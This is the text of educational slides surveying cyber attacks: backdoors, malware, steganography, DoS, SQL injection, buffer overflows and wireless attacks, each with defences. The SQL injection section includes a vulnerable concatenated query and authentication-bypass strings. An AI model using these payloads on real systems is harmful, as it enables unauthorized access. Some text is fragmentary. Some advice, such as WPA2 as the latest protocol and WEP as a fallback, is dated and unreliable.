or data can be accessed for troubleshooting or other
purposes. Attackers make use of backdoors that software
developers install, and they also install backdoors
themselves as part of a computer exploit.
 Backdoor
 Backdoors allow the attackers to quietly get into the
system by deceiving the security protocols and gain
administrative access. It is similar to the real-life robbery
in which burglars take advantage of the loopholes in a
house and get a 'backdoor' entry for conducting the theft.
 After gaining high-level administrative privilege, the
cyber attackers could perform various horrendous tasks
like injecting spyware, gaining remote access, hack the
device, steal sensitive information, encrypt the system
through ransomware, and many more.
 Backdoors are originally meant for helping software
developers and testers, so they are not always bad.
 Types of Backdoor

 Administrative Backdoor: Sometimes software

developers intentionally leave a backdoor into the
program so that in case of any failure or error, they can
easily reach the core of the software's code and quickly
solve the issue. Such Backdoors are called the
Administrative Backdoors. These deliberate Backdoors
can also help the software testers to testify the codes.
 Though such Backdoors are only known to the
developers, a skillful hacker can take advantage of it and
silently use it for his benefit. So Administrative Backdoor
can be called a type of loophole in the program.
 Types of Backdoor
 Malicious Backdoor: Malicious Backdoors are
the backdoors installed on the system by
cybercriminals using malware programs
like Remote Access Trojan (RAT). These are
specifically designed for taking control of the
system or network and conduct malicious tasks.
RAT is a malware program that can reach the
root of the system and install the backdoor. RAT
is generally spread through a malicious program.
 Malicious Backdoor

• Cryptojacking occurs when a victim's computing

resources are hijacked to mine
cryptocurrency. Cryptojacking attacks target all sorts of
devices and systems.
• DoS attacks overwhelm servers, systems and networks
with unauthorized traffic so that legitimate users can't
access them.
• Ransomware is malware that prevents users from
accessing a system and the files it contains. Attackers
usually demand payment of a ransom for the resources to
be unlocked.
 Malicious Backdoor
• Spyware is malware that steals sensitive information and
relays it to other users without the information owner's
knowledge. It can steal credit card numbers, account
login data and location information. Keyloggers are a
form of spyware used to record a user's keystrokes and
steal passwords and other sensitive data.
• Trojan horse is a malicious program that's often installed
through a backdoor and appears harmless. A backdoor
Trojan includes a backdoor that enables remote
administrative control of a targeted system.
 Signs of backdoor attacks
• Unusual network traffic: Observe any unexpected or
unexplained network traffic, especially if it's coming from or
going to unfamiliar IP addresses or domains. Backdoors often
communicate with command-and-control servers, generating
suspicious network activity.
• Unauthorised remote access: If you notice remote access or
control of your systems without your knowledge or approval, it
could signify an exploited backdoor. Unauthorized remote
access tools or sessions should raise immediate suspicion.
• Suspicious system modifications: Backdoors may modify
system configurations, registry keys, or other settings to
maintain persistence and facilitate unauthorized access.
Unexplained changes to system files, processes, or services
could indicate a backdoor's presence.
 Signs of backdoor attacks
• Unusual user account activity: Monitor for new user
accounts being created, particularly with elevated privileges,
without authorization. Backdoors may create hidden or
backdoor accounts to gain unauthorized access.
• Antivirus software alerts: Pay attention to any alerts or
warnings from your antivirus or security software, which
may detect and flag backdoor malware or suspicious
activities.
• System performance issues: Backdoors may consume
system resources, leading to performance degradation,
increased CPU or memory usage, or other system
slowdowns.
 Signs of backdoor
• Unauthorized attacks
data exfiltration: If you notice
unauthorized data transfers or sensitive information
being exfiltrated from your systems, it could be a sign of
a backdoor being used for data theft.
• Strange error messages or log entries: Backdoors may
generate unusual error messages, log entries, or system
notifications that could indicate their presence or
activities.
 Detection and prevention

• Antimalware. Some antimalware software can detect and

prevent a backdoor from being installed.
• Firewalls. Ensure a firewall protects every device on a
network. Application firewalls and web application
firewalls can help prevent backdoor attacks by limiting
the traffic that can flow across open ports.
 Steganography

 A steganography technique involves hiding sensitive

information within an ordinary, non-secret file or
message, so that it will not be detected.
 You can use steganography to hide text, video, images,
or even audio data. It’s a helpful bit of knowledge,
limited only by the type of medium and the author’s
imagination.
 Different Types of Steganography

 1. Text Steganography − There is steganography in

text files, which entails secretly storing information.
In this method, the hidden data is encoded into the
letter of each word.
 2. Image Steganography − The second type of
steganography is image steganography, which
entails concealing data by using an image of a
different object as a cover. Pixel intensities are the
key to data concealment in image steganography.
 Steganography
•
Examples
Writing with invisible ink
• Embedding text in a picture (like an artist hiding their
initials in a painting they’ve done)
• Backward masking a message in an audio file (remember
those stories of evil messages recorded backward on rock
and roll records?)
• Concealing information in either metadata or within a file
header
• Hiding an image in a video, viewable only if the video is
played at a particular frame rate
• Embedding a secret message in either the green, blue, or
red channels of an RRB image.
 DOS
 A denial-of-service (DoS) attack is a type of cyber attack in
which a malicious actor aims to render a computer or
other device unavailable to its intended users by
interrupting the device's normal functioning. DoS attacks
typically function by overwhelming or flooding a targeted
machine with requests until normal traffic is unable to be
processed, resulting in denial-of-service to addition users.
A DoS attack is characterized by using a single computer to
launch the attack.
 A distributed denial-of-service (DDoS) attack is a type of
DoS attack that comes from many distributed sources, such
as a botnet DDoS attack.
 How does a DoS attack work?
 DoS attacks typically exploit vulnerabilities in a target’s
network or computer systems. Attackers can use a variety
of methods to generate overwhelming traffic or requests,
including:
1. Flooding the target with a massive amount of data
2. Sending repeated requests to a specific part of the system
3. Exploiting software vulnerabilities to crash the system
 How can you tell if a computer is
experiencing a DoS attack?
 While it can be difficult to separate an attack from other
network connectivity errors or heavy bandwidth
consumption, some characteristics may indicate an attack
is underway.
 Indicators of a DoS attack include:
• Atypically slow network performance such as long load
times for files or websites
• The inability to load a particular website such as your web
property
• A sudden loss of connectivity across devices on the same
network
 What is the difference between a

DDoS attack and a DOS attack?
The distinguishing difference between DDoS and DoS is
the number of connections utilized in the attack. Some
DoS attacks, such as “low and slow” attacks like Slowloris,
derive their power in the simplicity and minimal
requirements needed to them be effective.
 Prevention
• Cloud Mitigation Provider – Cloud mitigation providers are experts
at providing DDoS mitigation from the cloud. This means they have
built out massive amounts of network bandwidth and DDoS
mitigation capacity at multiple sites around the Internet that can
take in any type of network traffic, whether you use multiple ISP’s,
your own data center, or any number of cloud providers. They can
scrub the traffic for you and only send “clean” traffic to your data
center.
• Firewall – This is the simplest and least effective method. Python
scripts are often written to filter out malicious traffic, or existing
firewalls can be utilized by enterprises to block such traffic.
• Internet Service Provider (ISP) – Some enterprises use their ISP to
provide DDoS mitigation. These ISPs have more bandwidth than an
enterprise would, which can help with large volumetric attacks.
 SQL Injection

 SQL injection (SQLi) is a cyberattack that injects

malicious SQL code into an application, allowing the
attacker to view or modify a database. According to the
Open Web Application Security Project, injection attacks
which include SQL injections, were the third most serious
web application security risk in 2021. In the applications
they tested, there were 274,000 occurrences of injection.
SQL Injection
 Types of SQL Injections
 SQL injections typically fall under three categories: In-
band SQLi (Classic), Inferential SQLi (Blind) and Out-of-
band SQLi. You can classify SQL injections types based
on the methods they use to access backend data and
their damage potential.
 In-band SQLi
 The attacker uses the same channel of communication to
s. In-band SQLi’s simplicity and efficiency make it one of
the most common types of SQLi attack. There are two sub-
variations of this method:
• Error-based SQLi—the attacker performs actions that
cause the database to produce error messages. The
attacker can potentially use the data provided by these
error messages to gather information about the structure
of the database.
• Union-based SQLi—this technique takes advantage of the
UNION SQL operator, which fuses multiple select
statements generated by the database to get a single
HTTP response. This response may contain data that can
be leveraged by the attacker.
 Inferential (Blind) SQLi

 The attacker sends data payloads to the server and

observes the response and behavior of the server to
learn more about its structure. This method is called
blind SQLi because the data is not transferred from the
website database to the attacker, thus the attacker cannot
see information about the attack in-band.
 Blind SQL injections rely on the response and behavioral
patterns of the server so they are typically slower to
execute but may be just as harmful. Blind SQL injections
can be classified as follows:
 Inferential (Blind) SQLi
• Boolean—that attacker sends a SQL query to the database
prompting the application to return a result. The result will
vary depending on whether the query is true or false. Based
on the result, the information within the HTTP response will
modify or stay unchanged. The attacker can then work out if
the message generated a true or false result.
• Time-based—attacker sends a SQL query to the database,
which makes the database wait (for a period in seconds) before
it can react. The attacker can see from the time the database
takes to respond, whether a query is true or false. Based on
the result, an HTTP response will be generated instantly or
after a waiting period. The attacker can thus work out if the
message they used returned true or false, without relying on
data from the database.
 Out-of-band SQLi
 The attacker can only carry out this form of attack when
certain features are enabled on the database server
used by the web application. This form of attack is
primarily used as an alternative to the in-band and
inferential SQLi techniques.
 Out-of-band SQLi is performed when the attacker can’t
use the same channel to launch the attack and gather
information, or when a server is too slow or unstable
for these actions to be performed. These techniques
count on the capacity of the server to create DNS or
HTTP requests to transfer data to an attacker.
 SQLi attacks can also be classified by
the method they use to inject data:
• SQL injection based on user input – web applications
accept inputs through forms, which pass a user’s input to
the database for processing. If the web application accepts
these inputs without sanitizing them, an attacker can
inject malicious SQL statements.
• SQL injection based on cookies – another approach to SQL
injection is modifying cookies to “poison” database
queries. Web applications often load cookies and use their
data as part of database operations. A malicious user, or
malware deployed on a user’s device, could modify
cookies, to inject SQL in an unexpected way.
 SQLi attacks can also be classified by
the method they use to inject data:
• SQL injection based on HTTP headers – server variables such
HTTP headers can also be used for SQL injection. If a web
application accepts inputs from HTTP headers, fake headers
containing arbitrary SQL can inject code into the database.
• Second-order SQL injection – these are possibly the most
complex SQL injection attacks, because they may lie
dormant for a long period of time. A second-order SQL
injection attack delivers poisoned data, which might be
considered benign in one context, but is malicious in another
context. Even if developers sanitize all application inputs,
they could still be vulnerable to this type of attack.
 Real-Life SQL Injection Attack Examples
 Breaches Enabled by SQL Injection
• GhostShell attack—hackers from APT group Team GhostShell
targeted 53 universities using SQL injection, stole and published
36,000 personal records belonging to students, faculty, and staff.
• Turkish government—another APT group, RedHack collective, used
SQL injection to breach the Turkish government website and erase
debt to government agencies.
• 7-Eleven breach—a team of attackers used SQL injection to
penetrate corporate systems at several companies, primarily the 7-
Eleven retail chain, stealing 130 million credit card numbers.
• HBGary breach—hackers related to the Anonymous activist group
used SQL Injection to take down the IT security company’s website.
The attack was a response to HBGary CEO publicizing that he had
names of Anonymous organization members.
 Real-Life SQL Injection Attack Examples
 Notable SQL Injection Vulnerabilities
• Tesla vulnerability—in 2014, security researchers publicized that
they were able to breach the website of Tesla using SQL injection,
gain administrative privileges and steal user data.
• Cisco vulnerability—in 2018, a SQL injection vulnerability was
found in Cisco Prime License Manager. The vulnerability allowed
attackers to gain shell access to systems on which the license
manager was deployed. Cisco has patched the vulnerability.
• Fortnite vulnerability—Fortnite is an online game with over 350
million users. In 2019, a SQL injection vulnerability was discovered
which could let attackers access user accounts. The vulnerability
was patched.
 SQL Injection Code
Example 1: Using SQLi to Authenticate as
Examples
Administrator
This example shows how an attacker can use SQL injection
to circumvent an application’s authentication and gain
administrator privileges.
Consider a simple authentication system using a database
table with usernames and passwords. A user’s POST
request will provide the variables user and pass, and
these are inserted into a SQL statement:
sql = "SELECT id FROM users WHERE username='" + user
+ "' AND password='" + pass + "'"
The problem here is that the SQL statement uses
concatenation to combine data. The attacker can
provide a string like this instead of
the pass variable:
 SQL Injection Code
Examples
The resulting SQL query will be run against the database:
SELECT id FROM users WHERE username='user' AND
password='pass' OR 5=5'
Because 5=5 is a condition that always evaluates to true, the
entire WHERE statement will be true, regardless of the
username or password provided.
The WHERE statement will return the first ID from the users
table, which is commonly the administrator. This means the
attacker can access the application without authentication,
and also has administrator privileges.
A more advanced form of this attack is where the attacker
adds a code comment symbol at the end of the SQL
statement, allowing them to further manipulate the SQL
query. The following will work in most databases including
MySQL, PostgreSQL, and Oracle:
' OR '5'='5' /*
 How to Detect SQL injection
Vulnerabilities?
•To detect SQL injection vulnerabilities, you can start by performing input
validation testing, where special characters like ' or " are inserted into
inputs to see if they cause errors.
•Automated tools like SQLMap or Burp Suite can scan for vulnerabilities
by simulating attacks.
•Reviewing the source code helps identify insecure practices, such as using
dynamic SQL queries without proper parameterization.
•Monitoring for unexpected database error messages can reveal potential
issues.
•Finally, conducting thorough penetration testing, including both black-
box and white-box methods, provides a comprehensive assessment of
security weaknesses.
 Buffer Overflow
 A buffer overflow occurs when a program writing data to a
buffer overloads that buffer's capacity. It's like pouring 12
ounces of milk into an 8 ounce glass.
 Buffer Overflow
 A buffer overflow attack is a common cyberattack that
deliberately exploits a buffer overflow vulnerability
where user-controlled data is written to memory. By
submitting more data than can fit in the allocated
memory block, the attacker can overwrite data in other
parts of memory.
 Attackers can perform buffer overflow attacks for various
reasons, such as overwriting critical code or data to crash
the program, injecting malicious code to be run to the
program, or modifying critical values, changing the
execution flow of the program.
 Buffer Overflow Threat
 Buffer overflow attacks can be used to achieve various objectives,
including:
• Denial of Service (DoS) Attacks: Within an application’s memory
space are pointers, code, and other pieces of data that are critical
to the program’s ability to execute. Overwriting this data could
cause the program to crash, resulting in a DoS attack.
• Code Execution: A common goal of buffer overflow exploits is to
force the vulnerable application to execute attacker-provided
code. This allows the attacker to run code on the affected
system with the same access and permissions as the exploited
application.
• Access Control Bypasses: Exploitation of buffer overflows to run
code can elevate an attacker’s access to a target system. This
expanded access can then be used to perform follow-on attacks.
 Types of Buffer Overflow Attacks

• Stack-Based Buffer Overflow: The program stack contains critical control

flow data for an application — such as function return pointers — and is
a common target of buffer overflow attacks. Overwriting a return pointer
can cause the program to jump to attacker-controlled data and execute it
as code, allowing the attacker to run code with the same permissions as
the application.
• Heap-Based Buffer Overflow: The program heap is used to dynamically
allocate memory to variables whose size is not defined when the
program compiles. By exploiting a buffer overflow vulnerability and
flooding the system heap, an attacker can overwrite critical application
data.
• Format String Attacks: Functions in the printf family in C/C++ can use
format strings, which allow reading and writing of memory. If user-
provided data is interpreted as a format string, it can be used to leak or
 How to Prevent Buffer Overflows
• Performing Input Validation: Buffer overflow vulnerabilities
occur when a program makes assumptions about user-
provided input without validating these assumptions.
Checking the length of data or only copying a certain number
of bytes to a memory location can help avoid buffer overflows.
• Enabling Runtime Memory Protection: Most computers have
built-in protections against buffer overflows such as Address
Space Layout Randomization (ASLR), Data Execution
Prevention (DEP), and Structured Exception Handling
Overwrite Protection. Enabling these protections makes buffer
overflow attacks much more difficult to perform.
 How to Prevent Buffer Overflows
• Avoiding Vulnerable Functions: Buffer overflows are made
possible by vulnerable functions such as gets, scanf, and strcpy
in C/C++. Buffer overflow vulnerabilities can be avoided by
properly using the safe versions of these functions.
• Using Memory-Safe Languages: Buffer overflows occur in
programming languages with fixed-size variables and no
memory protections. The use of other programming languages
such as Python, Java, or C# makes buffer overflows difficult or
impossible.
• Preventing Vulnerability Exploitation: Web application
firewalls (WAFs) and Web Application and API
Protection (WAAP) solutions can identify and block attempted
exploitation of buffer overflow vulnerabilities. This reduces the
risk that buffer overflow attacks pose to corporate application
security(AppSec).
 Attack on Wireless Networks

Wireless network attacks are deliberate and malicious

actions aimed at exploiting vulnerabilities in wireless
communication systems to gain unauthorized access,
intercept sensitive data, disrupt network operations, or
compromise the security of devices and users connected
to the network. These attacks target weaknesses in the
protocols, configurations, or encryption mechanisms of
wireless networks, taking advantage of their inherent
nature of broadcasting signals over the airwaves.
 Types of Wireless Network Attacks

 1. Wireless Eavesdropping (Passive Attacks)

 Attackers use tools like packet sniffers to intercept and monitor
wireless communications between devices. By capturing data packets
transmitted over the air, they can potentially obtain sensitive
information, such as login credentials, financial data, or personal
information.
 2. Wireless Spoofing (Man-in-the-Middle Attacks)
 In these attacks, the attacker positions themselves between the
wireless client and the legitimate access point, intercepting and
manipulating data transmissions. The attacker may then relay the
information back and forth, making it appear as if they are the
legitimate access point. This enables them to snoop on data or perform
other malicious actions unnoticed.
 Types of Wireless Network Attacks

 3. Wireless Jamming (Denial-of-Service Attacks)

 Attackers flood the wireless frequency spectrum with
interference signals, disrupting legitimate communications
between devices and access points. By creating excessive
noise, they can render the wireless network unusable for
legitimate users.
 4. Rogue Access Points
 Attackers set up unauthorized access points, mimicking
legitimate ones, to deceive users into connecting to them.
Once connected, the attacker can eavesdrop, capture data, or
launch further attacks on the unsuspecting users.
 Types of Wireless Network Attacks

 5. Brute-Force Attacks
 Attackers try various combinations of passwords or
encryption keys in rapid succession until they find the correct
one to gain unauthorized access to the wireless network.
 6. WEP/WPA Cracking
 Attackers exploit vulnerabilities in older wireless security
protocols like Wired Equivalent Privacy (WEP) and Wi-Fi
Protected Access (WPA) to gain unauthorized access to
encrypted wireless networks.
 Types of Wireless Network Attacks

 7. Evil Twin Attacks

 Attackers create fake access points with names similar to
legitimate ones, tricking users into connecting to the malicious
network. Once connected, the attacker can intercept sensitive
data or execute further attacks.
 8. Deauthentication/Disassociation Attacks
 Attackers send forged deauthentication or disassociation
frames to wireless devices, forcing them to disconnect from
the network, leading to service disruptions or potential
vulnerabilities when devices automatically reconnect.
 Preventing Wireless Network Attacks:
Safeguarding Your Digital Domain
 1. Update your computer often
 Regularly update your operating system and applications to ensure you
have the latest security patches and fixes. Timely updates help address
discovered vulnerabilities, making it harder for attackers to exploit
known weaknesses.
 2. Use MAC filtering
 Enable MAC filtering on your wireless router to control access to your
network. By specifying which devices are allowed to connect based on
their unique MAC addresses, you can prevent unauthorized access and
enhance your network’s security.
 3. Disable SSID(Service set identifier) broadcasting
 Turn off SSID broadcasting to make your wireless network invisible to
casual observers. This prevents your network from being easily
discoverable and adds an extra layer of obscurity for potential attackers.
 Preventing Wireless Network Attacks:
Safeguarding Your Digital Domain
 4. Use WPA2 encryption
 Utilize WPA2 encryption, the latest and most secure
protocol, to safeguard your data as it travels between
devices and access points. Encryption ensures that even if
intercepted, your data remains unintelligible to
unauthorized entities.
 5. Change the default SSID
 Customize your router’s SSID to something unique and
unrelated to personal information. Avoid using common
names like “Linksys” or “default” to deter attackers from
identifying and targeting your network.
 Preventing Wireless Network Attacks:
Safeguarding Your Digital Domain
 6. Disable file sharing
 Turn off file sharing on your network to prevent
unauthorized users from accessing your sensitive files. If file
sharing is necessary, ensure you set up secure passwords to
limit access to approved users only.
 7. Enable WEP encryption (only if using an older router)
 If your router doesn’t support WPA2(Wi-Fi Protected
Access), use WEP(Wired Equivalent Privacy) encryption as a
fallback option. However, keep in mind that WEP is less
secure than WPA2 and should only be considered if
absolutely necessary.